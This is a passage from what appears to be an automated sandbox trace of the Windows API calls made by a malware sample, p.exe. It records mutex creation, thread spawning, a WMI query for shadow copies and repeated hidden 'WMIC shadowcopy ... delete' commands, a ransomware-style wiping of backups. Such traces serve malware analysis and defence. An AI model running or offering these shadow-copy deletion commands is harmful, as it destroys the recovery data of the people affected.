lpProcName="NdrProxyForwardingFunction21") returned 0x766e61e5 [0055.506] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction22") returned 0x766e61fc [0055.506] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction23") returned 0x766e6213 [0055.507] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction24") returned 0x766e622a [0055.507] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction25") returned 0x766e6241 [0055.507] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction26") returned 0x766e6258 [0055.507] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction27") returned 0x766e626f [0055.507] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction28") returned 0x766e6286 [0055.507] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction29") returned 0x766e629d [0055.507] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction3") returned 0x7669432c [0055.508] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction30") returned 0x766e62b4 [0055.508] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction31") returned 0x766e62cb [0055.508] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction32") returned 0x766e62e2 [0055.508] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction4") returned 0x766e608c [0055.508] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction5") returned 0x76694483 [0055.508] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction6") returned 0x766e60a3 [0055.508] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction7") returned 0x76694431 [0055.509] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction8") returned 0x766e60ba [0055.509] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction9") returned 0x766e60d1 [0055.509] GetProcAddress (hModule=0x76620000, lpProcName="ObjectStublessClient10") returned 0x76643413 [0055.509] GetProcAddress (hModule=0x76620000, lpProcName="ObjectStublessClient11") returned 0x7663b4e9 [0055.509] GetProcAddress (hModule=0x76620000, lpProcName="ObjectStublessClient12") returned 0x7663d21b [0055.509] GetProcAddress (hModule=0x76620000, lpProcName="ObjectStublessClient13") returned 0x766434a8 [0055.510] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0055.510] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="169923hi23qw237721415d66") returned 0x174 [0055.511] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0055.511] WaitForSingleObject (hHandle=0x174, dwMilliseconds=0x0) returned 0x0 [0055.511] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0055.511] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe\" " [0055.511] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x759d0000 [0055.511] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe\" ", pNumArgs=0x18f270 | out: pNumArgs=0x18f270) returned 0xec6bc0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe" [0055.512] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0055.512] GetNativeSystemInfo (in: lpSystemInfo=0x18f2c0 | out: lpSystemInfo=0x18f2c0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0055.512] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x10) returned 0xec68e8 [0055.512] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0055.512] LoadLibraryA (lpLibFileName="NTDLL.dll") returned 0x77c40000 [0055.513] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0055.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2812d80, lpParameter=0x2827bd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x178 [0055.514] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2812d80, lpParameter=0x2827bd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x17c [0055.514] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2812d80, lpParameter=0x2827bd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x180 [0055.515] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2812d80, lpParameter=0x2827bd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x184 [0055.515] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x10) returned 0xec6900 [0055.515] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2812d80, lpParameter=0x2827bfc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x188 [0055.516] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2812d80, lpParameter=0x2827bfc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0055.516] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2812d80, lpParameter=0x2827bfc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x190 [0055.517] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2812d80, lpParameter=0x2827bfc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0055.517] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0055.519] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0055.549] CoCreateInstance (in: rclsid=0x281f1ec*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x281f20c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x18ea2c | out: ppv=0x18ea2c*=0x6b80828) returned 0x0 [0057.496] GetNativeSystemInfo (in: lpSystemInfo=0x18ea34 | out: lpSystemInfo=0x18ea34*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0057.496] CoCreateInstance (in: rclsid=0x281f1fc*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x281f21c*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x18ea28 | out: ppv=0x18ea28*=0x6b8c688) returned 0x0 [0059.520] WbemContext:IWbemContext:SetValue (This=0x6b8c688, wszName="__ProviderArchitecture", lFlags=0, pValue=0x18ea58*(varType=0x3, wReserved1=0x0, wReserved2=0x7a0, wReserved3=0x0, varVal1=0x40, varVal2=0x190000)) returned 0x0 [0059.522] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6b80828, strNetworkResource="ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x6b8c688, ppNamespace=0x18ea30 | out: ppNamespace=0x18ea30*=0x6b8cfdc) returned 0x0 [0068.715] CoSetProxyBlanket (pProxy=0x6b8cfdc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0068.717] IWbemServices:ExecQuery (in: This=0x6b8cfdc, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=48, pCtx=0x0, ppEnum=0x18ea24 | out: ppEnum=0x18ea24*=0x6b8d07c) returned 0x0 [0068.810] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0072.804] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x6bb8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xec6e00, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0072.804] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0072.805] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete") returned 114 [0072.805] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0072.806] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0072.806] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0072.807] lstrcpyW (in: lpString1=0x18e09c, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete" [0072.807] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0072.807] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e054*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e044 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete", lpProcessInformation=0x18e044*(hProcess=0x234, hThread=0x230, dwProcessId=0x7ec, dwThreadId=0x634)) returned 1 [0072.821] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x2710) returned 0x0 [0084.500] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0084.501] CloseHandle (hObject=0x230) returned 1 [0084.501] CloseHandle (hObject=0x234) returned 1 [0084.502] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0084.502] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0084.502] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0084.502] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0084.510] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{43A11862-374F-4B42-8013-C8A59B8690F4}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0084.510] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete") returned 114 [0084.510] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0084.510] lstrcpyW (in: lpString1=0x18e090, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete" [0084.510] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e048*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e038 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete", lpProcessInformation=0x18e038*(hProcess=0x230, hThread=0x234, dwProcessId=0x84c, dwThreadId=0x85c)) returned 1 [0084.516] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x2710) returned 0x0 [0089.598] CloseHandle (hObject=0x234) returned 1 [0089.598] CloseHandle (hObject=0x230) returned 1 [0089.598] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0089.599] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0089.599] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0089.600] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{84D74FA3-DE98-47B0-806B-7C5805D67A02}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0089.600] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete") returned 114 [0089.600] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0089.600] lstrcpyW (in: lpString1=0x18e084, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete" [0089.600] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e03c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e02c | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete", lpProcessInformation=0x18e02c*(hProcess=0x234, hThread=0x230, dwProcessId=0xaac, dwThreadId=0xacc)) returned 1 [0089.607] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x2710) returned 0x0 [0091.658] CloseHandle (hObject=0x230) returned 1 [0091.658] CloseHandle (hObject=0x234) returned 1 [0091.658] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0091.658] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0091.658] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0091.659] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{1D028705-A254-45DE-BE10-D22FA08DBB3A}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0091.659] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete") returned 114 [0091.659] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0091.659] lstrcpyW (in: lpString1=0x18e078, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete" [0091.660] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e030*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e020 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete", lpProcessInformation=0x18e020*(hProcess=0x230, hThread=0x234, dwProcessId=0xa64, dwThreadId=0xb5c)) returned 1 [0091.665] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x2710) returned 0x0 [0093.175] CloseHandle (hObject=0x234) returned 1 [0093.175] CloseHandle (hObject=0x230) returned 1 [0093.175] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0093.175] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0093.176] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0093.177] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{51FFEAE1-0810-4889-92A9-E72417EBFA41}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0093.177] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete") returned 114 [0093.177] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0093.177] lstrcpyW (in: lpString1=0x18e06c, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete" [0093.177] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e024*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e014 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete", lpProcessInformation=0x18e014*(hProcess=0x234, hThread=0x230, dwProcessId=0xb0c, dwThreadId=0xaf0)) returned 1 [0093.184] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x2710) returned 0x0 [0094.801] CloseHandle (hObject=0x230) returned 1 [0094.801] CloseHandle (hObject=0x234) returned 1 [0094.801] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0094.802] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0094.802] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0094.810] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, pVal=0x18ea08*(varType=0x0, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1=0xee3cfc, varVal2=0x18ea50), pType=0x0, plFlavor=0x0 | out: pVal=0x18ea08*(varType=0x8, wReserved1=0xec, wReserved2=0x0, wReserved3=0xea, varVal1="{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}", varVal2=0x18ea50), pType=0x0, plFlavor=0x0) returned 0x0 [0094.810] wsprintfW (in: param_1=0x18ea70, param_2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete" | out: param_1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete") returned 114 [0094.810] Wow64DisableWow64FsRedirection (in: OldValue=0x18ea1c | out: OldValue=0x18ea1c*=0x0) returned 1 [0094.810] lstrcpyW (in: lpString1=0x18e060, lpString2="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete" | out: lpString1="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete") returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete" [0094.810] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e018*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e008 | out: lpCommandLine="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete", lpProcessInformation=0x18e008*(hProcess=0x230, hThread=0x234, dwProcessId=0x270, dwThreadId=0xb3c)) returned 1 [0094.816] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x2710) returned 0x0 [0096.843] CloseHandle (hObject=0x234) returned 1 [0096.843] CloseHandle (hObject=0x230) returned 1 [0096.843] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0096.843] IUnknown:Release (This=0x6b8d0b8) returned 0x0 [0096.843] IEnumWbemClassObject:Next (in: This=0x6b8d07c, lTimeout=-1, uCount=0x1, apObjects=0x18ea20, puReturned=0x18ea6c | out: apObjects=0x18ea20*=0x6b8d0b8, puReturned=0x18ea6c*=0x1) returned 0x0 [0096.844] IWbemClassObject:Get (in: This=0x6b8d0b8, wszName="ID", lFlags=0, 